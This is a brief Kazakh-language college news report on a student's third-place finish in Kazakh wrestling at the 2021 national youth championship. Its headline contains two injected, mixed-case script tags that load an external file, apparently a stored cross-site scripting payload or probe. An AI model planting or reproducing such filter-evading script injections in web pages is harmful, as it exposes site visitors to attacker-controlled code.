Қазақстан Республикасы чемпионатында үздік үштіктен көрінді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.04.2021
2021 жылдың 26-30 сәуір аралығында Қазақстан Республикасы Тәуелсіздігінің 30 жылдығына арналған 2004-2005 жылы туылған жасөспірімдер арасында (ұлдар және қыздар) Қазақстан Республикасының чемпионаты өтті. Орал қаласында өткен чемпионатта Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі Дене мәдениеті бөлімінің студенті Төлеухан Алмат қазақша күрес спорт түрінен 76 келі салмақ дәрежесінде ІІІ орын иеленді! Қазақстан Республикасы мәдениет және спорт министрлігінің спорт және денешынықтыру істері комитетінің бастамасымен өткізілген чемпионатқа 17 облыстан 300-ге жуық спортшылар қатысып, 9 салмақ дәрежесі бойынша бәсекеге түсті. Жүзден жүйрік шығып, жоғары нәтиже көрсете білген жеңімпазымызды аталған жеңісімен құттықтаймыз!
Просмотров: 461


Пікір қосу



Деректерді қолтаңбаға қосу